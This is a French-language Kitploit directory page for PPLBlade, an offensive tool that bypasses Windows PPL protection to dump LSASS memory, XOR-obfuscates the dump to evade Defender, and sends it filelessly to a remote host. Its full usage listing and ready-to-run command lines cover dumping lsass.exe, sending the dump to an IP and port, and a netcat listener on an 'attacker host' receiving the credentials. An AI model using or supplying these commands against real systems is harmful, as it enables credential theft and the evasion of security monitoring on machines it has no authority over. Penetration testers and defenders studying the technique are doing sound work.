Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PPLBlade — Contourne la protection PPL pour vider la mémoire du processus LSASS, obscurcit les fichiers de vidage avec XOR, et les exfiltre à distance via RAW ou SMB sans écrire sur le disque. | Kitploit
Outils/GitHubGitHub/tastypepperoni/pplblade
Escalade de PrivilègesCriminalistique MémoireExploitationExfiltration de DonnéesPost-Exploitation
GitHubtastypepperoni/pplblade

PPLBlade

Contourne la protection PPL pour vider la mémoire du processus LSASS, obscurcit les fichiers de vidage avec XOR, et les exfiltre à distance via RAW ou SMB sans écrire sur le disque.

Voir le dépôt
597635il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PPLBlade

Outil de vidage de processus protégé qui supporte l'obfuscation du vidage mémoire et son transfert vers des postes de travail distants sans le déposer sur le disque.

Fonctionnalités clés:

  1. Contournement de la protection PPL
  2. Obfuscation des fichiers de vidage mémoire pour contourner les mécanismes de détection basés sur les signatures de Defender
  3. Téléchargement du vidage mémoire via les méthodes RAW et SMB sans le déposer sur le disque (vidage sans fichier)

Un aperçu des techniques utilisées dans cet outil est disponible ici : https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Notez que PROCEXP15.SYS est listé dans les fichiers source à des fins de compilation. Il n'a pas besoin d'être transféré sur la machine cible avec le PPLBlade.exe.

Il est déjà intégré dans le PPLBlade.exe. L'exploit est un seul exécutable.

Modes:

  1. Dump - Vider la mémoire du processus en utilisant le PID ou le nom du processus
  2. Decrypt - Revenir le fichier de vidage obfusqué (--obfuscate) à son état d'origine
  3. Cleanup - Effectuer un nettoyage manuel, au cas où quelque chose se passe mal lors de l'exécution (Notez que les valeurs des options doivent être les mêmes que pour l'exécution que nous essayons de nettoyer)
  4. DoThatLsassThing - Vider lsass.exe en utilisant le pilote Process Explorer (poc basique)

Modes de Handle:

  1. Direct - Ouvre un handle PROCESS_ALL_ACCESS directement, en utilisant la fonction OpenProcess()
  2. Procexp - Utilise PROCEXP152.sys pour obtenir un handle
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

Exemples:

POC basique qui utilise PROCEXP152.sys pour vider lsass :

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(Notez qu'il ne XOR pas le fichier de vidage, fournissez un indicateur obfuscate supplémentaire pour activer la fonctionnalité XOR)

Téléchargez le vidage LSASS obfusqué vers un emplacement distant :

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Hôte attaquant :

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Désobfusquer le vidage mémoire :

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Télécharger l’outil